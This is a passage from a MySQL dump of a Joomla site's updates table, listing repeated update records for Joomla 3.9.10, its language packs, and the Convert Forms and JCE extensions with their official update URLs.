(573, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(574, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(575, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(576, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(577, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(578, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(579, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(580, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(581, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(582, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(583, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(584, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(585, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(586, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(587, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(588, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(589, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(590, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(591, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(592, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(593, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(594, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(595, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(596, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(597, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(598, 18, 0, 'JCE 2.7.15', '', 'pkg_jce', 'package', '', 0, '2.7.15', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-15-released', ''),
(599, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(600, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(601, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(602, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(603, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(604, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(605, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(606, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(607, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(608, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(609, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(610, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(611, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(612, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(613, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(614, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(615, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(616, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(617, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(618, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(619, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(620, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(621, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(622, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(623, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(624, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(625, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(626, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(627, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(628, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(629, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(630, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(631, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(632, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(633, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(634, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(635, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(636, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(637, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(638, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(639, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(640, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(641, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(642, 18, 0, 'JCE 2.7.15', '', 'pkg_jce', 'package', '', 0, '2.7.15', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-15-released', ''),
(643, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(644, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(645, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(646, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(647, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(648, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(649, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(650, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(651, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(652, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(653, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(654, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(655, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(656, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(657, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(658, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(659, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(660, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(661, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(662, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', '');
INSERT INTO `y57u5_updates` (`update_id`, `update_site_id`, `extension_id`, `name`, `description`, `element`, `type`, `folder`, `client_id`, `version`, `data`, `detailsurl`, `infourl`, `extra_query`) VALUES
(663, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(664, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(665, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(666, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(667, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(668, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(669, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(670, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(671, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(672, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(673, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(674, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(675, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(676, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(677, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(678, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(679, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(680, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(681, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(682, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(683, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(684, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(685, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(686, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(687, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(688, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(689, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(690, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(691, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(692, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(693, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(694, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(695, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(696, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(697, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(698, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(699, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(700, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(701, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(702, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(703, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(704, 18, 0, 'JCE 2.7.15', '', 'pkg_jce', 'package', '', 0, '2.7.15', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-15-released', ''),
(705, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(706, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(707, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(708, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(709, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(710, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(711, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(712, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(713, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(714, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(715, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(716, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(717, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(718, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(719, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(720, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(721, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(722, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(723, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(724, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(725, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(726, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(727, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(728, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(729, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(730, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(731, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(732, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(733, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(734, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(735, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(736, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(737, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(738, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(739, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(740, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(741, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(742, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(743, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(744, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(745, 18, 0, 'JCE 2.7.15', '', 'pkg_jce', 'package', '', 0, '2.7.15', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-15-released', ''),
(746, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(747, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(748, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(749, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
